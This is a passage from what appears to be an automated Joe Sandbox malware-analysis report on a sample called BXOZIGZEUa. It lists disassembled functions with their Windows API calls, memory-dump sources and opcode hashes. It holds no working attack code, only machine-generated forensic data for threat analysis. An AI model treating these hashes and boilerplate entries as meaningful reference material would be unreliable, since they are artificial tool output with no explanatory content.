                                                              • ScreenToClient.USER32(?,?), ref: 0054CD3E
                                                              • SetCapture.USER32(?), ref: 0054CD5E
                                                              • GetWindowRect.USER32(?,?), ref: 0054CD99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ParentRectWindow$CaptureClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 3234571238-0
                                                              • Opcode ID: 63b2817e95d378a5427e232a4c38da0ef80adcaee0a66c9022febf05edbf1f4b
                                                              • Instruction ID: 06588784170d8349c4483e8aa381f96cd9c7f2220cf301d34a93c3899d8dada0
                                                              • Opcode Fuzzy Hash: 63b2817e95d378a5427e232a4c38da0ef80adcaee0a66c9022febf05edbf1f4b
                                                              • Instruction Fuzzy Hash: 53216A71501748EFCB21DB64C808BEABFF9FF88309F1404ADE48A87251DB76AA44DB50
                                                              APIs
                                                              • EnableMenuItem.USER32(?,00000000,?), ref: 004DC745
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • GetFocus.USER32 ref: 004DC75B
                                                              • GetParent.USER32(?), ref: 004DC769
                                                              • SendMessageW.USER32(?,00000028,00000000,00000000), ref: 004DC77C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                              • String ID:
                                                              • API String ID: 3849708097-0
                                                              • Opcode ID: c5a44b0c8fa120e8fb28c90205884c4f1ca67a43671542f6ef3df9f93fc408de
                                                              • Instruction ID: 1f0ba182ff7e99e0e37599a3d47d21deee6bf9993ada0c80f0e4a3f03a4f7381
                                                              • Opcode Fuzzy Hash: c5a44b0c8fa120e8fb28c90205884c4f1ca67a43671542f6ef3df9f93fc408de
                                                              • Instruction Fuzzy Hash: 87118E71101602AFCB20AF65DCD4D2BBBFAFF94315710862FF14686A60CB39AC45DE98
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 00517475
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0051748E
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005174C1
                                                              • DragFinish.SHELL32(?), ref: 005174E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Drag$FileQuery$ActiveFinishWindow
                                                              • String ID:
                                                              • API String ID: 892977027-0
                                                              • Opcode ID: 17b9d545b86c246c6099bb19219828fc0f2a5df4bfde698a09f5f747dd5473f2
                                                              • Instruction ID: 9d6abf296d22f67a7c69c5fbf92e74316c8145fa83a01a065afadac2bc60d2f5
                                                              • Opcode Fuzzy Hash: 17b9d545b86c246c6099bb19219828fc0f2a5df4bfde698a09f5f747dd5473f2
                                                              • Instruction Fuzzy Hash: 4C115171A4021CABCF20EB65DC89FED7BB9FB58315F10059AF119A7191CB749984CF60
                                                              APIs
                                                              • WindowFromPoint.USER32(?,?), ref: 0055C457
                                                              • GetParent.USER32(00000000), ref: 0055C465
                                                              • ScreenToClient.USER32(00000000,?), ref: 0055C486
                                                              • IsWindowEnabled.USER32(00000000), ref: 0055C49F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientEnabledFromParentPointScreen
                                                              • String ID:
                                                              • API String ID: 1871804413-0
                                                              • Opcode ID: f2bc69e100def2dfde96665af75e3f6b1466bfe9c51a2535d9ffddffc0b3e674
                                                              • Instruction ID: 29119b185255cc61f99058b5a889bcc4e2f50992a84f554a0848d5c34c53d7e5
                                                              • Opcode Fuzzy Hash: f2bc69e100def2dfde96665af75e3f6b1466bfe9c51a2535d9ffddffc0b3e674
                                                              • Instruction Fuzzy Hash: 1401B176600610BF8B129B699C24DBEBE7AEFC5712714401AFD11D3310EB79CD05DB50
                                                              APIs
                                                              • GetTopWindow.USER32(?), ref: 004EA579
                                                              • GetTopWindow.USER32(00000000), ref: 004EA5B8
                                                              • GetWindow.USER32(00000000,00000002), ref: 004EA5D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window
                                                              • String ID:
                                                              • API String ID: 2353593579-0
                                                              • Opcode ID: c7807f2065f902d2de1a0eb5371074b8d5eba405b9a8ce6eea2258d5e6ce9417
                                                              • Instruction ID: 8db05a48a8d6c46d1731901af9dce4b73e4fd2ffce722cc4ac9c9f665d7e07ac
                                                              • Opcode Fuzzy Hash: c7807f2065f902d2de1a0eb5371074b8d5eba405b9a8ce6eea2258d5e6ce9417
                                                              • Instruction Fuzzy Hash: 0901D732001699BBCF126F92DC04EAF3A26FF59352F144016FA1451160CB3ADA75EFAA
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Destroy
                                                              • String ID:
                                                              • API String ID: 3707531092-0
                                                              • Opcode ID: 8aff8b2a53dbdabfb6481a964e784dfd9b37ae358c72922a160da3c3910fbf04
                                                              • Instruction ID: 2afab2804fa54bc6e75f2d32bd97150134cc92f16792c11dc7c16933c7084b5d
                                                              • Opcode Fuzzy Hash: 8aff8b2a53dbdabfb6481a964e784dfd9b37ae358c72922a160da3c3910fbf04
                                                              • Instruction Fuzzy Hash: 21018032101604AFEF215B65DC85FBABBB5FF60361F14462AE45887190DF35AC14DA64
                                                              APIs
                                                              • GetMenuItemCount.USER32(00000000), ref: 0051B1F7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CountItemMenu
                                                              • String ID:
                                                              • API String ID: 1409047151-0
                                                              • Opcode ID: c125cffb3128a9783a933dc8d3c866823d41112362f997250e0ec7c60166797a
                                                              • Instruction ID: 70967af0fe592f2956034c72ad96c2f5f8affb31a1eb8c7aee4b5a37ec3a5014
                                                              • Opcode Fuzzy Hash: c125cffb3128a9783a933dc8d3c866823d41112362f997250e0ec7c60166797a
                                                              • Instruction Fuzzy Hash: 63018179A00209BBFB015B65CC84EFE7EA9FB98794F300529F411E2120DB35DDC9E660
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 004E9667
                                                              • GetTopWindow.USER32(00000000), ref: 004E967A
                                                                • Part of subcall function 004E965A: GetWindow.USER32(00000000,00000002), ref: 004E96C1
                                                              • GetTopWindow.USER32(?), ref: 004E96AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Item
                                                              • String ID:
                                                              • API String ID: 369458955-0
                                                              • Opcode ID: 7bd85c8fd7b37ee58236fa23a137fd80d7c6391cfe9676376735592d18cefa46
                                                              • Instruction ID: 8e66af47f084e676cacba86fa72351fadce008bd8cfa3196963c85891c7f6b62
                                                              • Opcode Fuzzy Hash: 7bd85c8fd7b37ee58236fa23a137fd80d7c6391cfe9676376735592d18cefa46
                                                              • Instruction Fuzzy Hash: E6014432501695B78F222F738C04EAF3A55AF65396F014117FD04A52A0DF39CD119AAD
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051B86A
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051B87F
                                                              • IsWindow.USER32(?), ref: 0051B88D
                                                              • SetWindowLongW.USER32(?,000000F0,?), ref: 0051B89D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID:
                                                              • API String ID: 847901565-0
                                                              • Opcode ID: 26f46317b2b203dace51befe63446614938ff65dd40ab13039e8764bca96b316
                                                              • Instruction ID: 019a759daf155a922748b9c84a1b0bf48e02316a4d5ab7242f1fd10e1617548e
                                                              • Opcode Fuzzy Hash: 26f46317b2b203dace51befe63446614938ff65dd40ab13039e8764bca96b316
                                                              • Instruction Fuzzy Hash: 1F018671104214BFEB00AB758C45EAA7BACFF54335B200758F426E62D2DF74E8408654
                                                              APIs
                                                              • InflateRect.USER32(?,00000002,00000002), ref: 004F8794
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004F87A5
                                                              • UpdateWindow.USER32(?), ref: 004F87AE
                                                              • SetRectEmpty.USER32(?), ref: 004F87BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$EmptyInflateInvalidateUpdateWindow
                                                              • String ID:
                                                              • API String ID: 3040190709-0
                                                              • Opcode ID: 268fecea43e075d17e63ae18e586cffe4d8fb159e8c61f9e17df4435a3b50542
                                                              • Instruction ID: e1c1fd5077575c8edb594bb857a6ed1f906aa817a891d80f8222d159ed9abdaf
                                                              • Opcode Fuzzy Hash: 268fecea43e075d17e63ae18e586cffe4d8fb159e8c61f9e17df4435a3b50542
                                                              • Instruction Fuzzy Hash: 860184715001099BCF00DFA8DC89BA67BB8FB09721F100265AD06EE0A6CB716549CF60
                                                              APIs
                                                              • OffsetRect.USER32(?,00000000,?), ref: 005B3935
                                                              • InflateRect.USER32(?,00000002,00000002), ref: 005B3943
                                                              • InvalidateRect.USER32(?,?,00000001,?,?,?,005B3BE1,?), ref: 005B3952
                                                              • UpdateWindow.USER32(?), ref: 005B395B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$InflateInvalidateOffsetUpdateWindow
                                                              • String ID:
                                                              • API String ID: 222119783-0
                                                              • Opcode ID: 1f3088ca54b01279968e3dae9df911ec1bf68a68cc61796c56ee9f20562a594f
                                                              • Instruction ID: 4aac3c822860e5944d5e007f37f607598a0a2ceae665e0397ad7d23a8e22cf89
                                                              • Opcode Fuzzy Hash: 1f3088ca54b01279968e3dae9df911ec1bf68a68cc61796c56ee9f20562a594f
                                                              • Instruction Fuzzy Hash: 4D012C72601109AFCB00DFA8DD89FFA7BF9EB49700F510065BA06EB051CA71EA49DB61
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,?,000000F0), ref: 004ECAB8
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004ECAC4
                                                              • LockResource.KERNEL32(00000000), ref: 004ECAD1
                                                              • FreeResource.KERNEL32(00000000,00000000), ref: 004ECAED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindFreeLoadLock
                                                              • String ID:
                                                              • API String ID: 1078018258-0
                                                              • Opcode ID: 4321ef5c1b9ff64ad571ec9ccaf0e273bad0d7e5bc05f3e3b9007150b10d0f70
                                                              • Instruction ID: 224880203457013581bdca0b7a6dd2cbe20b51ccfcef992dcf6ccec2ace3daa0
                                                              • Opcode Fuzzy Hash: 4321ef5c1b9ff64ad571ec9ccaf0e273bad0d7e5bc05f3e3b9007150b10d0f70
                                                              • Instruction Fuzzy Hash: DCF0CD362012567B87109FE79CC8A7BB65DEF54395705403AB901D3301DEB8DD05D664
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Parent$Focus
                                                              • String ID:
                                                              • API String ID: 384096180-0
                                                              • Opcode ID: 7b9fcae649ad4515aaf7607c0c86e50c3662cdf2d14e58ec4f0b8a91e4aa1a0d
                                                              • Instruction ID: 5a83fde8c12e2d6d9a590a0c9405df79f695d15e3775b627e834a11871783a4d
                                                              • Opcode Fuzzy Hash: 7b9fcae649ad4515aaf7607c0c86e50c3662cdf2d14e58ec4f0b8a91e4aa1a0d
                                                              • Instruction Fuzzy Hash: DDF0CD726107809FCB207777AC08E6B76A6AFD831AF05096EF44586561DF78DC01DA54
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,?,00000005,00000000,?,?,?,?,0052DAB9,?,?), ref: 0053F651
                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,0052DAB9,?,?), ref: 0053F659
                                                              • LockResource.KERNEL32(00000000,?,?,?,?,0052DAB9,?,?), ref: 0053F666
                                                              • FreeResource.KERNEL32(00000000,00000000,0052DAB9,?,?,?,?,?,0052DAB9,?,?), ref: 0053F67E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindFreeLoadLock
                                                              • String ID:
                                                              • API String ID: 1078018258-0
                                                              • Opcode ID: 289b4dc268a76b508f2f918bce226629f20583b98babdeb5dfc8f9914bb46e5b
                                                              • Instruction ID: 580f1b95ed2f96ef85a48649f11e8a8704c0720b31eb9d4abb314f28e337d41a
                                                              • Opcode Fuzzy Hash: 289b4dc268a76b508f2f918bce226629f20583b98babdeb5dfc8f9914bb46e5b
                                                              • Instruction Fuzzy Hash: CEF0B436601115BBCB016BA99C4CCBFBB6DEF953A47014025F505D3221DF788D04E764
                                                              APIs
                                                                • Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66
                                                              • UpdateWindow.USER32(?), ref: 005B02E5
                                                              • UpdateWindow.USER32(?), ref: 005B02F1
                                                              • SetRectEmpty.USER32(?), ref: 005B02FD
                                                              • SetRectEmpty.USER32(?), ref: 005B0306
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$EmptyRectUpdate$Show
                                                              • String ID:
                                                              • API String ID: 1262231214-0
                                                              • Opcode ID: f10944efdf17d7753e7f577bb6e6ca6d58db1a3d57cb2f8913b466ce5df5663c
                                                              • Instruction ID: af7cd8b925dd86394f395ea1de38929f823a2a83c13b1c4c61ef5f850a8427a8
                                                              • Opcode Fuzzy Hash: f10944efdf17d7753e7f577bb6e6ca6d58db1a3d57cb2f8913b466ce5df5663c
                                                              • Instruction Fuzzy Hash: EFF08232600A149BD7216B25DC04F97BBE8BF84711F0A0529E19493070DB75F805CA90
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0054EB8C
                                                                • Part of subcall function 004FEB01: __EH_prolog3.LIBCMT ref: 004FEB08
                                                                • Part of subcall function 0056D52B: __EH_prolog3.LIBCMT ref: 0056D532
                                                                • Part of subcall function 005B4D84: __EH_prolog3.LIBCMT ref: 005B4D8B
                                                                • Part of subcall function 005B4D84: DestroyIcon.USER32(?,00000004,0054EBC6,00000004,0054EE45,?,?,?), ref: 005B4DAE
                                                                • Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DB6
                                                                • Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DBE
                                                                • Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DC6
                                                                • Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DCE
                                                                • Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DD6
                                                                • Part of subcall function 005B4D84: ~_Task_impl.LIBCPMT ref: 005B4E10
